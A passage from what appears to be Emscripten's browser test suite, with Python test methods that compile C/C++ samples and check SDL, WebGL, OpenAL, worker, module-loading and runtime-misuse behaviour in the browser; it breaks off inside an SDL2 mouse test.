self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-g.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-b.js', '-lSDL', '-lGL'])
def test_sdl_ttf_render_text_solid(self):
self.btest('sdl_ttf_render_text_solid.c', reference='sdl_ttf_render_text_solid.png', args=['-O2', '-s', 'INITIAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_alloctext(self):
self.btest('sdl_alloctext.c', expected='1', args=['-O2', '-s', 'INITIAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_surface_refcount(self):
self.btest('sdl_surface_refcount.c', args=['-lSDL'], expected='1')
def test_sdl_free_screen(self):
self.btest('sdl_free_screen.cpp', args=['-lSDL', '-lGL'], reference='htmltest.png')
@requires_graphics_hardware
def test_glbegin_points(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('glbegin_points.c', reference='glbegin_points.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_s3tc(self):
shutil.copyfile(test_file('screenshot.dds'), 'screenshot.dds')
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_s3tc_ffp_only(self):
shutil.copyfile(test_file('screenshot.dds'), 'screenshot.dds')
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION', '-s', 'GL_FFP_ONLY', '-lGL', '-lSDL'])
@no_chrome('see #7117')
@requires_graphics_hardware
def test_aniso(self):
shutil.copyfile(test_file('water.dds'), 'water.dds')
self.btest('aniso.c', reference='aniso.png', reference_slack=2, args=['--preload-file', 'water.dds', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '-Wno-incompatible-pointer-types'])
@requires_graphics_hardware
def test_tex_nonbyte(self):
self.btest('tex_nonbyte.c', reference='tex_nonbyte.png', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_float_tex(self):
self.btest('float_tex.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_subdata(self):
self.btest('gl_subdata.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_perspective(self):
self.btest('perspective.c', reference='perspective.png', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_glerror(self):
self.btest('gl_error.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION', '-lGL'])
def test_openal_error(self):
for args in [
[],
['-lopenal', '-s', 'STRICT'],
['--closure=1']
]:
print(args)
self.btest('openal_error.c', expected='1', args=args)
def test_openal_capture_sanity(self):
self.btest('openal_capture_sanity.c', expected='0')
def test_runtimelink(self):
create_file('header.h', r'''
struct point
{
int x, y;
};
''')
create_file('supp.cpp', r'''
#include <stdio.h>
#include "header.h"
extern void mainFunc(int x);
extern int mainInt;
void suppFunc(struct point &p) {
printf("supp: %d,%d\n", p.x, p.y);
mainFunc(p.x + p.y);
printf("supp see: %d\n", mainInt);
}
int suppInt = 76;
''')
create_file('main.cpp', r'''
#include <stdio.h>
#include "header.h"
extern void suppFunc(struct point &p);
extern int suppInt;
void mainFunc(int x) {
printf("main: %d\n", x);
}
int mainInt = 543;
int main( int argc, const char *argv[] ) {
struct point p = { 54, 2 };
suppFunc(p);
printf("main see: %d\nok.\n", suppInt);
return suppInt;
}
''')
self.run_process([EMCC, 'supp.cpp', '-o', 'supp.wasm', '-s', 'SIDE_MODULE', '-O2', '-s', 'EXPORT_ALL'])
self.btest_exit('main.cpp', args=['-DBROWSER=1', '-s', 'MAIN_MODULE', '-O2', 'supp.wasm', '-s', 'EXPORT_ALL'], assert_returncode=76)
def test_pre_run_deps(self):
# Adding a dependency in preRun will delay run
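# (run() is held back until every dependency added with addRunDependency() has been released
#  with removeRunDependency(), so Module.okk is already set by the time main executes.)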
create_file('pre.js', '''
Module.preRun = function() {
addRunDependency();
out('preRun called, added a dependency...');
setTimeout(function() {
Module.okk = 10;
removeRunDependency()
}, 2000);
};
''')
for mem in [0, 1]:
self.btest('pre_run_deps.cpp', expected='10', args=['--pre-js', 'pre.js', '--memory-init-file', str(mem)])
@no_wasm_backend('mem init file')
def test_mem_init(self):
create_file('pre.js', '''
function myJSCallback() { // called from main()
Module._note(1);
}
Module.preRun = function() {
addOnPreMain(function() {
Module._note(2);
});
};
''')
create_file('post.js', '''
var assert = function(check, text) {
if (!check) {
console.log('assert failed: ' + text);
maybeReportResultToServer(9);
}
}
Module._note(4); // this happens too early! and is overwritten when the mem init arrives
''')
# with assertions, we notice when memory was written to too early
self.btest('mem_init.cpp', expected='9', args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1'])
# otherwise, we just overwrite
self.btest('mem_init.cpp', expected='3', args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1', '-s', 'ASSERTIONS=0'])
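# Exercise Module.memoryInitializerRequest: a successful XHR for the real .mem file should report 1,
# while a bogus URL should hit the warning path and report 0.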
@no_wasm_backend('mem init file')
def test_mem_init_request(self):
def test(what, status):
print(what, status)
create_file('pre.js', '''
var xhr = Module.memoryInitializerRequest = new XMLHttpRequest();
xhr.open('GET', "''' + what + '''", true);
xhr.responseType = 'arraybuffer';
xhr.send(null);
console.warn = function(x) {
if (x.indexOf('a problem seems to have happened with Module.memoryInitializerRequest') >= 0) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?0');
setTimeout(xhr.onload = function() {
console.log('close!');
window.close();
}, 1000);
xhr.send();
throw 'halt';
}
console.log('WARNING: ' + x);
};
''' % self.port)
self.btest('mem_init_request.cpp', expected=status, args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--memory-init-file', '1'])
test('test.html.mem', '1')
test('nothing.nowhere', '0')
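# Calling into compiled code via ccall/cwrap/direct exports must abort (under ASSERTIONS) before the
# runtime is ready or after EXIT_RUNTIME has shut it down, and must work while the runtime is alive.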
def test_runtime_misuse(self):
post_prep = '''
var expected_ok = false;
function doCcall(n) {
ccall('note', 'string', ['number'], [n]);
}
var wrapped = cwrap('note', 'string', ['number']); // returns a string to suppress cwrap optimization
function doCwrapCall(n) {
var str = wrapped(n);
out('got ' + str);
assert(str === 'silly-string');
}
function doDirectCall(n) {
Module['_note'](n);
}
'''
post_test = '''
var ok = false;
try {
doCcall(1);
ok = true; // should fail and not reach here, runtime is not ready yet so ccall will abort
} catch(e) {
out('expected fail 1');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doCwrapCall(2);
ok = true; // should fail and not reach here, runtime is not ready yet so cwrap call will abort
} catch(e) {
out('expected fail 2');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doDirectCall(3);
ok = true; // should fail and not reach here, runtime is not ready yet so the direct call will abort
} catch(e) {
out('expected fail 3');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
'''
post_hook = r'''
function myJSCallback() {
// Run on the next event loop, as code may run in a postRun right after main().
setTimeout(function() {
var xhr = new XMLHttpRequest();
assert(Module.noted);
xhr.open('GET', 'http://localhost:%s/report_result?' + HEAP32[Module.noted>>2]);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}, 0);
// called from main, this is an ok time
doCcall(100);
doCwrapCall(200);
doDirectCall(300);
}
''' % self.port
create_file('pre_runtime.js', r'''
Module.onRuntimeInitialized = function(){
myJSCallback();
};
''')
for filename, extra_args, second_code in [
('runtime_misuse.cpp', [], 600),
('runtime_misuse_2.cpp', ['--pre-js', 'pre_runtime.js'], 601) # 601, because no main means we *do* run another call after exit()
]:
for mode in [[], ['-s', 'WASM=0']]:
print('\n', filename, extra_args, mode)
print('mem init, so async, call too early')
create_file('post.js', post_prep + post_test + post_hook)
self.btest(filename, expected='600', args=['--post-js', 'post.js', '--memory-init-file', '1', '-s', 'EXIT_RUNTIME'] + extra_args + mode, reporting=Reporting.NONE)
print('sync startup, call too late')
create_file('post.js', post_prep + 'Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected=str(second_code), args=['--post-js', 'post.js', '-s', 'EXIT_RUNTIME'] + extra_args + mode, reporting=Reporting.NONE)
print('sync, runtime still alive, so all good')
create_file('post.js', post_prep + 'expected_ok = true; Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected='606', args=['--post-js', 'post.js'] + extra_args + mode, reporting=Reporting.NONE)
def test_cwrap_early(self):
self.btest(os.path.join('browser', 'cwrap_early.cpp'), args=['-O2', '-s', 'ASSERTIONS', '--pre-js', test_file('browser', 'cwrap_early.js'), '-s', 'EXPORTED_RUNTIME_METHODS=[cwrap]'], expected='0')
def test_worker_api(self):
self.compile_btest([test_file('worker_api_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER', '-s', 'EXPORTED_FUNCTIONS=_one'])
self.btest('worker_api_main.cpp', expected='566')
def test_worker_api_2(self):
self.compile_btest([test_file('worker_api_2_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER', '-O2', '--minify=0', '-s', 'EXPORTED_FUNCTIONS=_one,_two,_three,_four', '--closure=1'])
self.btest('worker_api_2_main.cpp', args=['-O2', '--minify=0'], expected='11')
def test_worker_api_3(self):
self.compile_btest([test_file('worker_api_3_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER', '-s', 'EXPORTED_FUNCTIONS=_one'])
self.btest('worker_api_3_main.cpp', expected='5')
def test_worker_api_sleep(self):
self.compile_btest([test_file('worker_api_worker_sleep.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER', '-s', 'EXPORTED_FUNCTIONS=_one', '-s', 'ASYNCIFY'])
self.btest('worker_api_main.cpp', expected='566')
def test_emscripten_async_wget2(self):
self.btest('test_emscripten_async_wget2.cpp', expected='0')
def test_module(self):
self.run_process([EMCC, test_file('browser_module.cpp'), '-o', 'lib.wasm', '-O2', '-s', 'SIDE_MODULE', '-s', 'EXPORTED_FUNCTIONS=_one,_two'])
self.btest('browser_main.cpp', args=['-O2', '-s', 'MAIN_MODULE'], expected='8')
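# Preload a SIDE_MODULE shared library with --preload-file/--use-preload-plugins and verify that it
# appears in Module['preloadedWasm'] and can be dlopen()ed at runtime.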
@parameterized({
'non-lz4': ([],),
'lz4': (['-s', 'LZ4'],)
})
def test_preload_module(self, args):
create_file('library.c', r'''
#include <stdio.h>
int library_func() {
return 42;
}
''')
self.run_process([EMCC, 'library.c', '-s', 'SIDE_MODULE', '-O2', '-o', 'library.wasm', '-s', 'EXPORT_ALL'])
os.rename('library.wasm', 'library.so')
create_file('main.c', r'''
#include <dlfcn.h>
#include <stdio.h>
#include <emscripten.h>
int main() {
int found = EM_ASM_INT(
return Module['preloadedWasm']['/library.so'] !== undefined;
);
if (!found) {
return 1;
}
void *lib_handle = dlopen("/library.so", RTLD_NOW);
if (!lib_handle) {
return 2;
}
typedef int (*voidfunc)();
voidfunc x = (voidfunc)dlsym(lib_handle, "library_func");
if (!x || x() != 42) {
return 3;
}
return 0;
}
''')
self.btest_exit(
'main.c',
args=['-s', 'MAIN_MODULE', '--preload-file', '.@/', '-O2', '--use-preload-plugins', '-s', 'EXPORT_ALL'] + args)
def test_mmap_file(self):
create_file('data.dat', 'data from the file ' + ('.' * 9000))
self.btest(test_file('mmap_file.c'), expected='1', args=['--preload-file', 'data.dat'])
# This does not actually verify anything except that --cpuprofiler and --memoryprofiler compiles.
# Run interactive.test_cpuprofiler_memoryprofiler for interactive testing.
@requires_graphics_hardware
def test_cpuprofiler_memoryprofiler(self):
self.btest('hello_world_gles.c', expected='0', args=['-DLONGTEST=1', '-DTEST_MEMORYPROFILER_ALLOCATIONS_MAP=1', '-O2', '--cpuprofiler', '--memoryprofiler', '-lGL', '-lglut', '-DANIMATE'])
def test_uuid(self):
# Run with ./runner browser.test_uuid
# We run this test in Node/SPIDERMONKEY and browser environments because we try to make use of
# high quality crypto random number generators such as crypto.getRandomValues or randomBytes (if available).
# First run tests in Node and/or SPIDERMONKEY using self.run_js. Use closure compiler so we can check that
# require('crypto').randomBytes and window.crypto.getRandomValues don't get minified out.
self.run_process([EMCC, '-O2', '--closure=1', test_file('uuid', 'test.c'), '-o', 'test.js', '-luuid'])
test_js_closure = open('test.js').read()
# Check that test.js compiled with --closure 1 contains ").randomBytes" and "window.crypto.getRandomValues"
assert ").randomBytes" in test_js_closure
assert "window.crypto.getRandomValues" in test_js_closure
out = self.run_js('test.js')
print(out)
# Tidy up files that might have been created by this test.
try_delete(test_file('uuid', 'test.js'))
try_delete(test_file('uuid', 'test.js.map'))
# Now run test in browser
self.btest(test_file('uuid', 'test.c'), '1', args=['-luuid'])
@requires_graphics_hardware
def test_glew(self):
self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW'], expected='1')
self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-s', 'LEGACY_GL_EMULATION'], expected='1')
self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-DGLEW_MX'], expected='1')
self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-s', 'LEGACY_GL_EMULATION', '-DGLEW_MX'], expected='1')
def test_doublestart_bug(self):
create_file('pre.js', r'''
if (!Module['preRun']) Module['preRun'] = [];
Module["preRun"].push(function () {
addRunDependency('test_run_dependency');
removeRunDependency('test_run_dependency');
});
''')
self.btest('doublestart.c', args=['--pre-js', 'pre.js'], expected='1')
@parameterized({
'': ([],),
'closure': (['-O2', '-g1', '--closure=1', '-s', 'HTML5_SUPPORT_DEFERRING_USER_SENSITIVE_REQUESTS=0'],),
'pthread': (['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'],),
'legacy': (['-s', 'MIN_FIREFOX_VERSION=0', '-s', 'MIN_SAFARI_VERSION=0', '-s', 'MIN_IE_VERSION=0', '-s', 'MIN_EDGE_VERSION=0', '-s', 'MIN_CHROME_VERSION=0'],)
})
@requires_threads
def test_html5_core(self, opts):
self.btest(test_file('test_html5_core.c'), args=opts, expected='0')
@requires_threads
def test_html5_gamepad(self):
for opts in [[], ['-O2', '-g1', '--closure=1'], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
print(opts)
self.btest(test_file('test_gamepad.c'), args=[] + opts, expected='0')
@requires_graphics_hardware
def test_html5_webgl_create_context_no_antialias(self):
for opts in [[], ['-O2', '-g1', '--closure=1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(test_file('webgl_create_context.cpp'), args=opts + ['-DNO_ANTIALIAS', '-lGL'], expected='0')
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_threads
@requires_graphics_hardware
def test_html5_webgl_create_context(self):
for opts in [[], ['-O2', '-g1', '--closure=1'], ['-s', 'FULL_ES2=1'], ['-s', 'USE_PTHREADS']]:
print(opts)
self.btest(test_file('webgl_create_context.cpp'), args=opts + ['-lGL'], expected='0')
@requires_graphics_hardware
# Verify bug https://github.com/emscripten-core/emscripten/issues/4556: creating a WebGL context to Module.canvas without an ID explicitly assigned to it.
def test_html5_webgl_create_context2(self):
self.btest(test_file('webgl_create_context2.cpp'), expected='0')
@requires_graphics_hardware
# Verify bug https://github.com/emscripten-core/emscripten/issues/4556: creating a WebGL context to Module.canvas without an ID explicitly assigned to it.
# (this only makes sense in the old deprecated -s DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=0 mode)
def test_html5_special_event_targets(self):
self.btest(test_file('browser', 'html5_special_event_targets.cpp'), args=['-lGL'], expected='0')
@requires_graphics_hardware
def test_html5_webgl_destroy_context(self):
for opts in [[], ['-O2', '-g1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(test_file('webgl_destroy_context.cpp'), args=opts + ['--shell-file', test_file('webgl_destroy_context_shell.html'), '-lGL'], expected='0')
@no_chrome('see #7373')
@requires_graphics_hardware
def test_webgl_context_params(self):
if WINDOWS:
self.skipTest('SKIPPED due to bug https://bugzilla.mozilla.org/show_bug.cgi?id=1310005 - WebGL implementation advertises implementation defined GL_IMPLEMENTATION_COLOR_READ_TYPE/FORMAT pair that it cannot read with')
self.btest(test_file('webgl_color_buffer_readpixels.cpp'), args=['-lGL'], expected='0')
# Test for PR#5373 (https://github.com/emscripten-core/emscripten/pull/5373)
def test_webgl_shader_source_length(self):
for opts in [[], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(test_file('webgl_shader_source_length.cpp'), args=opts + ['-lGL'], expected='0')
# Tests calling glGetString(GL_UNMASKED_VENDOR_WEBGL).
def test_webgl_unmasked_vendor_webgl(self):
self.btest(test_file('webgl_unmasked_vendor_webgl.c'), args=['-lGL'], expected='0')
def test_webgl2(self):
for opts in [
['-s', 'MIN_CHROME_VERSION=0'],
['-O2', '-g1', '--closure=1', '-s', 'WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG'],
['-s', 'FULL_ES2=1'],
]:
print(opts)
self.btest(test_file('webgl2.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'] + opts, expected='0')
# Tests the WebGL 2 glGetBufferSubData() functionality.
@requires_graphics_hardware
def test_webgl2_get_buffer_sub_data(self):
self.btest(test_file('webgl2_get_buffer_sub_data.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'], expected='0')
@requires_graphics_hardware
@requires_threads
def test_webgl2_pthreads(self):
# test that a program can be compiled with pthreads and render WebGL2 properly on the main thread
# (the testcase doesn't even use threads, but is compiled with thread support).
self.btest(test_file('webgl2.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL', '-s', 'USE_PTHREADS'], expected='0')
def test_webgl2_objects(self):
self.btest(test_file('webgl2_objects.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'], expected='0')
def test_html5_webgl_api(self):
for mode in [['-s', 'OFFSCREENCANVAS_SUPPORT', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'],
['-s', 'OFFSCREEN_FRAMEBUFFER', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'],
[]]:
if 'OFFSCREENCANVAS_SUPPORT' in mode and os.getenv('EMTEST_LACKS_OFFSCREEN_CANVAS'):
continue
self.btest(test_file('html5_webgl.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'] + mode, expected='0')
def test_webgl2_ubos(self):
self.btest(test_file('webgl2_ubos.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'], expected='0')
@requires_graphics_hardware
def test_webgl2_garbage_free_entrypoints(self):
self.btest(test_file('webgl2_garbage_free_entrypoints.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1'], expected='1')
self.btest(test_file('webgl2_garbage_free_entrypoints.cpp'), expected='1')
@requires_graphics_hardware
def test_webgl2_backwards_compatibility_emulation(self):
self.btest(test_file('webgl2_backwards_compatibility_emulation.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-s', 'WEBGL2_BACKWARDS_COMPATIBILITY_EMULATION=1'], expected='0')
@requires_graphics_hardware
def test_webgl2_runtime_no_context(self):
# tests that if we support WebGL1 and 2, and WebGL2RenderingContext exists,
# but context creation fails, that we can then manually try to create a
# WebGL1 context and succeed.
self.btest(test_file('test_webgl2_runtime_no_context.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2'], expected='1')
@requires_graphics_hardware
def test_webgl2_invalid_teximage2d_type(self):
self.btest(test_file('webgl2_invalid_teximage2d_type.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2'], expected='0')
@requires_graphics_hardware
def test_webgl_with_closure(self):
self.btest(test_file('webgl_with_closure.cpp'), args=['-O2', '-s', 'MAX_WEBGL_VERSION=2', '--closure=1', '-lGL'], expected='0')
# Tests that -s GL_ASSERTIONS=1 and glVertexAttribPointer with packed types works
@requires_graphics_hardware
def test_webgl2_packed_types(self):
self.btest(test_file('webgl2_draw_packed_triangle.c'), args=['-lGL', '-s', 'MAX_WEBGL_VERSION=2', '-s', 'GL_ASSERTIONS'], expected='0')
@requires_graphics_hardware
def test_webgl2_pbo(self):
self.btest(test_file('webgl2_pbo.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'], expected='0')
@no_firefox('fails on CI likely due to GPU drivers there')
@requires_graphics_hardware
def test_webgl2_sokol_mipmap(self):
self.btest(test_file('third_party', 'sokol', 'mipmap-emsc.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL', '-O1'],
reference=os.path.join('third_party', 'sokol', 'mipmap-emsc.png'), reference_slack=2)
@no_firefox('fails on CI likely due to GPU drivers there')
@requires_graphics_hardware
def test_webgl2_sokol_mrt(self):
self.btest(test_file('third_party', 'sokol', 'mrt-emcc.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'],
reference=os.path.join('third_party', 'sokol', 'mrt-emcc.png'))
@requires_graphics_hardware
def test_webgl2_sokol_arraytex(self):
self.btest(test_file('third_party', 'sokol', 'arraytex-emsc.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'],
reference=os.path.join('third_party', 'sokol', 'arraytex-emsc.png'))
def test_sdl_touch(self):
for opts in [[], ['-O2', '-g1', '--closure=1']]:
print(opts)
self.btest(test_file('sdl_touch.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
def test_html5_mouse(self):
for opts in [[], ['-O2', '-g1', '--closure=1']]:
print(opts)
self.btest(test_file('test_html5_mouse.c'), args=opts + ['-DAUTOMATE_SUCCESS=1'], expected='0')
def test_sdl_mousewheel(self):
for opts in [[], ['-O2', '-g1', '--closure=1']]:
print(opts)
self.btest(test_file('test_sdl_mousewheel.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
def test_wget(self):
create_file('test.txt', 'emscripten')
self.btest(test_file('test_wget.c'), expected='1', args=['-s', 'ASYNCIFY'])
def test_wget_data(self):
create_file('test.txt', 'emscripten')
self.btest(test_file('test_wget_data.c'), expected='1', args=['-O2', '-g2', '-s', 'ASYNCIFY'])
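# Move the generated .wasm/.mem and file-packager data into a subdirectory and check that
# Module.locateFile (set either in a pre-js or in the shell HTML) redirects the loads there.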
def test_locate_file(self):
for wasm in [0, 1]:
print('wasm', wasm)
self.clear()
create_file('src.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
int main() {
FILE *f = fopen("data.txt", "r");
assert(f && "could not open file");
char buf[100];
int num = fread(buf, 1, 20, f);
assert(num == 20 && "could not read 20 bytes");
buf[20] = 0;
fclose(f);
int result = !strcmp("load me right before", buf);
printf("|%s| : %d\n", buf, result);
REPORT_RESULT(result);
return 0;
}
''')
create_file('data.txt', 'load me right before...')
create_file('pre.js', 'Module.locateFile = function(x) { return "sub/" + x };')
self.run_process([FILE_PACKAGER, 'test.data', '--preload', 'data.txt'], stdout=open('data.js', 'w'))
# put pre.js first, then the file packager data, so locateFile is there for the file loading code
self.compile_btest(['src.cpp', '-O2', '-g', '--pre-js', 'pre.js', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM', '-s', 'WASM=' + str(wasm)])
ensure_dir('sub')
if wasm:
shutil.move('page.wasm', os.path.join('sub', 'page.wasm'))
else:
shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
shutil.move('test.data', os.path.join('sub', 'test.data'))
self.run_browser('page.html', None, '/report_result?1')
# alternatively, put locateFile in the HTML
print('in html')
create_file('shell.html', '''
<body>
<script>
var Module = {
locateFile: function(x) { return "sub/" + x }
};
</script>
{{{ SCRIPT }}}
</body>
''')
def in_html(expected, args=[]):
self.compile_btest(['src.cpp', '-O2', '-g', '--shell-file', 'shell.html', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'SAFE_HEAP', '-s', 'ASSERTIONS', '-s', 'FORCE_FILESYSTEM', '-s', 'WASM=' + str(wasm)] + args)
if wasm:
shutil.move('page.wasm', os.path.join('sub', 'page.wasm'))
else:
shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
self.run_browser('page.html', None, '/report_result?' + expected)
in_html('1')
# verify that the mem init request succeeded in the latter case
if not wasm:
create_file('src.cpp', r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
int result = EM_ASM_INT({
return Module['memoryInitializerRequest'].status;
});
printf("memory init request: %d\n", result);
REPORT_RESULT(result);
return 0;
}
''')
in_html('200')
@requires_graphics_hardware
@parameterized({
'no_gl': (['-DCLIENT_API=GLFW_NO_API'],),
'gl_es': (['-DCLIENT_API=GLFW_OPENGL_ES_API'],)
})
def test_glfw3(self, args):
for opts in [[], ['-s', 'LEGACY_GL_EMULATION'], ['-Os', '--closure=1']]:
print(opts)
self.btest(test_file('glfw3.c'), args=['-s', 'USE_GLFW=3', '-lglfw', '-lGL'] + args + opts, expected='1')
@requires_graphics_hardware
def test_glfw_events(self):
self.btest(test_file('glfw_events.c'), args=['-s', 'USE_GLFW=2', "-DUSE_GLFW=2", '-lglfw', '-lGL'], expected='1')
self.btest(test_file('glfw_events.c'), args=['-s', 'USE_GLFW=3', "-DUSE_GLFW=3", '-lglfw', '-lGL'], expected='1')
@requires_graphics_hardware
def test_sdl2_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg')
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
self.compile_btest([
test_file('sdl2_image.c'), '-o', 'page.html', '-O2', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
@requires_graphics_hardware
def test_sdl2_image_jpeg(self):
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpeg')
self.compile_btest([
test_file('sdl2_image.c'), '-o', 'page.html',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
@requires_graphics_hardware
def test_sdl2_image_formats(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg')
self.btest('sdl2_image.c', expected='512', args=['--preload-file', 'screenshot.png', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.png"',
'-DNO_PRELOADED', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-s', 'SDL2_IMAGE_FORMATS=["png"]'])
self.btest('sdl2_image.c', expected='600', args=['--preload-file', 'screenshot.jpg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpg"',
'-DBITSPERPIXEL=24', '-DNO_PRELOADED', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-s', 'SDL2_IMAGE_FORMATS=["jpg"]'])
def test_sdl2_key(self):
create_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
var prevented = !document.dispatchEvent(event);
//send keypress if not prevented
if (!prevented) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.compile_btest([test_file('sdl2_key.c'), '-o', 'page.html', '-s', 'USE_SDL=2', '--pre-js', 'pre.js', '-s', 'EXPORTED_FUNCTIONS=_main,_one'])
self.run_browser('page.html', '', '/report_result?37182145')
def test_sdl2_text(self):
create_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.body.dispatchEvent(event);
}
''')
self.compile_btest([test_file('sdl2_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-s', 'EXPORTED_FUNCTIONS=_main,_one', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_mouse(self):
create_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
